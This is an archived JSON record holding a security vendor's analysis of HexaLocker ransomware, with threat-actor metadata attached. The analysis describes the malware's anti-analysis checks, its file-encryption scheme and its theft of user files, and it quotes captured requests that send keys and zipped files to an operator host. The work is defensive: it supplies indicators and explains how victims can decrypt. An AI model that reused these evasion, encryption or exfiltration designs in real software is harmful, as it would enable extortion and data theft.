{
	"id": "dac4a5bd-5b83-4ea6-858d-a593e15fe5a4",
	"created_at": "2026-04-06T00:07:18.372208Z",
	"updated_at": "2026-04-10T03:28:46.92538Z",
	"deleted_at": null,
	"sha1_hash": "9ba9d07cf35d9c1bdde574b53909cdf65cef2cfd",
	"title": "LAPSUS$ is dead, long live HexaLocker?",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 986463,
	"plain_text": "LAPSUS$ is dead, long live HexaLocker?\r\nBy Théo Letailleur\r\nArchived: 2026-04-05 15:47:09 UTC\r\nThe LAPSUS$ threat group has been known since 2021 for spear phishing, data theft, and extortion against large companies (e.g., Microsoft, Nvidia, Uber). Although destructive actions were reported, there was no known use of ransomware. In June 2024, LAPSUS$ announced its closure. However, two months later, a new ransomware called HexaLocker was advertised on Telegram channels. Its \"only real\" admin and probable developer is ZZART3XX, one of the LAPSUS$ administrators. This article dissects a HexaLocker ransomware sample to uncover its capabilities and help organizations that could be impacted by this new strain.\r\nIntroduction\r\nOn August 9th, 2024, the HexaLocker team advertised a new Windows ransomware on its Telegram channel. The message included a demonstration video and text promoting a Golang ransomware that implements a proprietary algorithm. Its features were also listed:\r\nhttps://www.synacktiv.com/publications/lapsus-is-dead-long-live-hexalocker.html\r\nPage 1 of 8\n\nHexaLocker ransomware advertisement on Telegram\r\nThe advertisement claims that HexaLocker stores decryption keys on bulletproof servers. This suggests that the decryption keys are sent to remote servers during the encryption process, but may not be protected with asymmetric cryptography (RSA, ECDH), as is usually observed with this kind of malware. Finally, data exfiltration, FUD (fully undetectable) and anti-analysis capabilities are promoted.\r\nThis article describes the actual capabilities of HexaLocker, based on one of its samples. A YARA rule and a list of indicators are linked at the end of the article.\r\nHexaLocker analysis\r\nSince July, a few HexaLocker samples have been available on VirusTotal, showing different evolutions. 
The sample dissected in this article is the most recent and most advanced one (for HexaLocker) in terms of features that we could find to date (August 23rd).\r\nBasic information\r\nHexaLocker basic information:\r\nSHA256: 87c1869871e9be8adaacb41a16c8fff691f86591416a592a77e308c4b7c041be\r\nFile type: PE32+ executable (console) x86-64, compiler: Go (>=1.15)\r\nFile size: 7966720 bytes\r\nThreat: Windows Golang ransomware and file stealer\r\nThe sample is not stripped, and its metadata provides the path of the Golang source file: C:/Users/zzart/Desktop/MalwareDeveloppement/HexaLocker RaaS/crypter_files.go. The username zzart most likely refers to ZZART3XX, one of the LAPSUS$ administrators.\r\nCapabilities\r\nHere is a summary of HexaLocker's capabilities, in order of execution:\r\n1. Anti-analysis (anti-VM, anti-debugging): uses an open-source Golang module called GoDefender. We have also seen another HexaLocker sample (be759e58413431dbe40d29ea5e399b1ebbfe75847c19a5a8f2610dab9f78ca8b) using a different anti-VM module called chacal.\r\n2. File encryption: recursively encrypts files under C:\\Users with AES-256-GCM, using a key derived with Argon2id from a random password. The \".hexalocker\" extension is appended to the filename. Before encryption starts, the password and salt are AES-GCM-encrypted with a hardcoded key and sent to a remote HTTPS server as GET query parameters.\r\n3. Ransom: the ransom note is created on the current user's desktop as \"Readme.txt\" and opened with notepad.exe.\r\n4. File stealing: the current user's files whose extensions match specific patterns (documents, source code, databases) are compressed into a single zip file and sent to a remote HTTPS server. 
Since this occurs after encryption, the collected files also carry the \".hexalocker\" extension.\r\nUpon execution, the sample opens a command prompt and outputs many debugging logs, which is not very stealthy.\r\nAnti-analysis\r\nRoutines from GoDefender are executed early in the program, in a function called main.FortniteProtect. The following mechanisms are used:\r\nAnti-virtualization:\r\nChecking for USB drives.\r\nChecking for default virtualization usernames (e.g., Johnson, John Doe, malware, sandbox, test, etc.).\r\nChecking for default virtualization video controllers (e.g., \"vmware\", \"virtualbox\").\r\nChecking for KVM environment files (e.g., baloon.sys, netkvm.sys).\r\nDetecting triage environments based on disk drive names (e.g., DADY HARDDISK, QEMU HARDDISK).\r\nDetecting small monitors (resolutions under 800×600 are suspicious).\r\nDetecting VM artifacts (VMware and VirtualBox drivers or guest tools).\r\nDetecting repetitive processes (more than 60 svchost.exe processes are suspicious).\r\nDetecting Parallels virtualization environments (guest tools).\r\nAnti-debug:\r\nDetecting commonly hooked functions used for anti-anti-debugging (e.g., CheckRemoteDebuggerPresent, GetTickCount, etc.).\r\nChecking for blacklisted window names (e.g., IDA, ILSpy, Fiddler, x32dbg, etc.).\r\nUsing the classic IsDebuggerPresent and CheckRemoteDebuggerPresent routines.\r\nPerforming an internet connection check (TCP connection to google.com:80).\r\nChecking the parent process (must be explorer.exe or cmd.exe).\r\nVerifying the number of running processes (must be above 50).\r\nChecking system uptime (must be above 20 minutes).\r\nIf you need more technical information, most of these mechanisms are detailed in the Unprotect Project.\r\nSince they are all invoked from a single function, bypassing them in a debugger is trivial, but they may still prevent execution in 
automated sandboxes.\r\nFile encryption\r\nNow, for the pièce de résistance: HexaLocker's file encryption capability.\r\nFirst, a 50-byte random alphanumeric password is generated, followed by a 16-byte random salt. A key is then derived from this password with Argon2id using the following parameters:\r\nThreads: 4\r\nIterations: 3\r\nMemory: 65536 KiB\r\nOutput length: 32 bytes\r\nSalt: the previously generated 16-byte salt\r\nBefore the encryption starts, an HTTPS request is made to a remote server to send the password, the salt, and some host information for identification purposes. This gives the ransomware operator the parameters needed to decrypt the files. The request is sent to https://darkslategray-baboon-853641.hostingersite[.]com/index.php, with the information carried in the GET query parameters. The password and salt are protected only by AES-GCM encryption under a key hardcoded in the sample; no asymmetric cryptography is involved.\r\nBelow is a capture of such an HTTP request (intercepted with the FakeNet tool):\r\n08/23/24 04:30:33 AM [ DNS Server] Received A request for domain 'darkslategray-baboon-853641.hostingers\r\n08/23/24 04:30:33 AM [ HTTPListener443] GET /index.php?method=new\u0026hwid=9F905EA7-EBD1-4D49-84F6-AE84E484E49F\u0026\r\n08/23/24 04:30:33 AM [ HTTPListener443] Host: darkslategray-baboon-853641.hostingersite.com\r\n08/23/24 04:30:33 AM [ HTTPListener443] User-Agent: Go-http-client/1.1\r\n08/23/24 04:30:33 AM [ HTTPListener443] Accept-Encoding: gzip\r\n08/23/24 04:30:33 AM [ HTTPListener443]\r\nThe values in the password and sel fields (sel is French for salt) are 28 bytes longer than expected. This is because each also carries the AES-GCM nonce (12 bytes) and the AES-GCM tag (16 bytes), laid out as nonce + ciphertext + tag.\r\nOnce these cryptographic values are stored on the operator's server, the encryption process begins. 
The analysed sample uses C:\\Users as the root directory and encrypts every file whose name matches a list of extensions. The extension list is quite extensive and covers nearly all file types. The targeted files are encrypted with AES-GCM: the 32-byte Argon2id output is used as the key, together with a 12-byte random nonce. Every encrypted file is saved on disk with the \".hexalocker\" extension, and the encrypted data also includes the nonce and the tag.\r\nSince no asymmetric cryptography is involved, a victim who has the ransomware sample (for the hardcoded key) and TLS-inspecting proxy logs of the key registration request (for the encrypted password and salt) can decrypt and recover the files. We developed a proof-of-concept (PoC) program that successfully recovers the encrypted files from the password, the salt, and the hardcoded key stored in the sample. We can provide the code for this program upon request.\r\nFinally, the ransom note is generated as a \"Readme.txt\" file on the current user's desktop and is automatically opened with notepad.exe.\r\nFile stealing\r\nHexaLocker searches for files in the current user's directories: Desktop, Documents, Favorites, Pictures, and Videos. The search pattern is a list of extensions with the \".hexalocker\" suffix, as these files are already encrypted. 
Below is the list of extensions (split into categories for better readability):\r\nDocuments: .txt, .doc, .docx, .odt, .xls, .xlsx, .ods, .ppt, .pptx, .odp, .rtf, .md, .tex, .wps, .pages\r\nData: .sql, .mdb, .accdb, .sqlite, .db, .dbf, .json, .csv, .numbers, .dif, .key, .plist, .trace, .tmp\r\nSource code: .py, .java, .c, .cpp, .js, .html, .css, .ruby, .php, .swift, .go, .r, .asp, .jsp\r\nConfiguration files: .ini, .cfg, .log, .xml, .yaml, .yml\r\nArchives: .zip, .rar, .tar, .gz, .7z, .bz2, .lz, .xz\r\nPictures: .jpg, .jpeg, .png, .gif, .bmp, .tiff\r\nAudio and video: .mp3, .wav, .avi, .mp4, .mov\r\nAll matching files are added to a new zip file named after the host UUID and located in the %Temp% folder. The zip file is then sent to the remote server in a single HTTPS POST request. The PHP file in the URL differs from the previous one: https://darkslategray-baboon-853641.hostingersite[.]com/receive.php.\r\nBelow is a capture of such an HTTP request (intercepted with the FakeNet tool):\r\n08/23/24 05:20:13 AM [ DNS Server] Received A request for domain 'darkslategray-baboon-853641.hostingers\r\n08/23/24 05:20:14 AM [ HTTPListener443] POST /receive.php HTTP/1.1\r\n08/23/24 05:20:14 AM [ HTTPListener443] Host: darkslategray-baboon-853641.hostingersite.com\r\n08/23/24 05:20:14 AM [ HTTPListener443] User-Agent: Go-http-client/1.1\r\n08/23/24 05:20:14 AM [ HTTPListener443] Content-Length: 36618\r\n08/23/24 05:20:14 AM [ HTTPListener443] Content-Type: multipart/form-data; boundary=a9cf213cc8cf5b6fffefc664\r\n08/23/24 05:20:14 AM [ HTTPListener443] Accept-Encoding: gzip\r\n08/23/24 05:20:14 AM [ HTTPListener443]\r\n08/23/24 05:20:14 AM [ HTTPListener443] --a9cf213cc8cf5b6fffefc664759d93533d3ed8975bb56ad6f6603dd6414d\r\n08/23/24 05:20:14 AM [ HTTPListener443] Content-Disposition: form-data; name=\"file\"; filename=\"9F905EA7-EBD1\r\n08/23/24 05:20:14 AM [ HTTPListener443] Content-Type: application/octet-stream\r\n08/23/24 05:20:14 AM [ 
HTTPListener443]\r\n08/23/24 05:20:14 AM [ HTTPListener443] .C:\\Users\\bonjour\\Desktop\\loremipsum.txt.hexalocker@|-h#!.m,~bO@dGYxX\r\n:nfDhfUY{w7fttg0hH-}i #^F_i(,aryNݷfL .0%#MqvAi]espPeہF.Me%\u003cIpHOPҚ\")$dx X\u0026ukܺ\r\n[... Compressed and encrypted data ...]\r\nWe did not stress-test the server, but the HTTP request could become quite large depending on the size and number of documents located in the victim's user profile.\r\nConclusion\r\nHexaLocker is a Golang ransomware that currently targets only Windows. It encrypts files with AES-256-GCM using a key derived with Argon2id from a random password. The password and salt are AES-GCM-encrypted with a hardcoded key and sent to a remote HTTPS server; no asymmetric cryptography is involved. HexaLocker also includes file-stealing capabilities. Additionally, the developer has used the open-source module GoDefender to hinder dynamic analysis and debugging.\r\nHexaLocker's code will certainly evolve, but the analysed sample already shows the main features and behaviour of this new strain. If HTTPS requests are intercepted (e.g., with a corporate proxy), the encrypted password and salt can be collected and used to decrypt affected files. To perform the decryption, the PoC program we developed can be reused, though it may need some adjustments, as we anticipate the hardcoded keys will change in future builds.\r\nMoreover, HexaLocker's impact on organizations could be imminent, as its team has announced an alliance with a new ransomware gang called DoubleFace to \"collaborate on big attacks\". 
They are also seeking other partners to help them spread their ransomware on a large scale.\r\nHexaLocker teaming up with DoubleFace\r\nThe X (formerly Twitter) handle @ZZART3XX is mentioned; its owner describes themselves as an administrator of LAPSUS$ (formerly), GLORIAMIST, and HexaLocker.\r\nYou can find a YARA rule and a list of IOCs in this GitHub repository: https://github.com/synacktiv/hexalocker-analysis\r\nIf any organization requires assistance with a compromise assessment or incident response, please feel free to contact Synacktiv.\r\nSource: https://www.synacktiv.com/publications/lapsus-is-dead-long-live-hexalocker.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.synacktiv.com/publications/lapsus-is-dead-long-live-hexalocker.html"
	],
	"report_names": [
		"lapsus-is-dead-long-live-hexalocker.html"
	],
	"threat_actors": [
		{
			"id": "be5097b2-a70f-490f-8c06-250773692fae",
			"created_at": "2022-10-27T08:27:13.22631Z",
			"updated_at": "2026-04-10T02:00:05.311385Z",
			"deleted_at": null,
			"main_name": "LAPSUS$",
			"aliases": [
				"LAPSUS$",
				"DEV-0537",
				"Strawberry Tempest"
			],
			"source_name": "MITRE:LAPSUS$",
			"tools": [
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d4b9608d-af69-43bc-a08a-38167ac6306a",
			"created_at": "2023-01-06T13:46:39.335061Z",
			"updated_at": "2026-04-10T02:00:03.291149Z",
			"deleted_at": null,
			"main_name": "LAPSUS",
			"aliases": [
				"Lapsus",
				"LAPSUS$",
				"DEV-0537",
				"SLIPPY SPIDER",
				"Strawberry Tempest",
				"UNC3661"
			],
			"source_name": "MISPGALAXY:LAPSUS",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b98eb1ec-dc8b-4aea-b112-9e485408dd14",
			"created_at": "2022-10-25T16:07:23.649308Z",
			"updated_at": "2026-04-10T02:00:04.701157Z",
			"deleted_at": null,
			"main_name": "FunnyDream",
			"aliases": [
				"Bronze Edgewood",
				"Red Hariasa",
				"TAG-16"
			],
			"source_name": "ETDA:FunnyDream",
			"tools": [
				"Chinoxy",
				"Filepak",
				"FilepakMonitor",
				"FunnyDream",
				"Keyrecord",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Md_client",
				"PCShare",
				"ScreenCap",
				"TcpBridge",
				"Tcp_transfer",
				"ccf32"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2347282d-6b88-4fbe-b816-16b156c285ac",
			"created_at": "2024-06-19T02:03:08.099397Z",
			"updated_at": "2026-04-10T02:00:03.663831Z",
			"deleted_at": null,
			"main_name": "GOLD RAINFOREST",
			"aliases": [
				"Lapsus$",
				"Slippy Spider ",
				"Strawberry Tempest "
			],
			"source_name": "Secureworks:GOLD RAINFOREST",
			"tools": [
				"Mimikatz"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "52d5d8b3-ab13-4fc4-8d5f-068f788e4f2b",
			"created_at": "2022-10-25T16:07:24.503878Z",
			"updated_at": "2026-04-10T02:00:05.014316Z",
			"deleted_at": null,
			"main_name": "Lapsus$",
			"aliases": [
				"DEV-0537",
				"G1004",
				"Slippy Spider",
				"Strawberry Tempest"
			],
			"source_name": "ETDA:Lapsus$",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434038,
	"ts_updated_at": 1775791726,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9ba9d07cf35d9c1bdde574b53909cdf65cef2cfd.pdf",
		"text": "https://archive.orkl.eu/9ba9d07cf35d9c1bdde574b53909cdf65cef2cfd.txt",
		"img": "https://archive.orkl.eu/9ba9d07cf35d9c1bdde574b53909cdf65cef2cfd.jpg"
	}
}